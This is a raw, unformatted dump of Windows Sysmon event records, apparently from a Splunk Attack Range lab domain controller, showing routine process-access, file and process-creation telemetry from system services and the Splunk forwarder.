providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.950{266CAFBE-64F7-6064-0801-00000000AE01}4280NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\tokens.dat.bakMD5=7804EB07B57051D39217276E90528A99,SHA256=0FB12DF4C704C9CEC3ED2169ACCF125B56D782C2582276163C8435FC0402FFB2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.810{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000008607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.742{266CAFBE-64F5-6064-0301-00000000AE01}6500win-dc-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 23542300x80000000000000008606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.717{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{0BDE7B0F-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.dbMD5=F3DC4461F59519C68ABD86B979EA9762,SHA256=5896967D61C1C716C98511DCFC267A12749D330E5DEB35ECCB4690DFA756C964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.654{266CAFBE-646C-6064-1300-00000000AE01}1228NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\Temp\UDD4859.tmpMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtruetrue 23542300x80000000000000008604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.654{266CAFBE-646C-6064-1300-00000000AE01}1228NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\Temp\UDD4859.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000008603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.623{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\tokens.dat2016-09-12 11:33:54.265 10341000x80000000000000008602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.420{266CAFBE-64F8-6064-0901-00000000AE01}53206108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.342{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.binMD5=E871053170AD09568882637D049295DC,SHA256=CEA9EABB0B46AC602CDC3FB6FE6215981F2D7C0C6A5C5023CE72860232DBE12B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.109{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
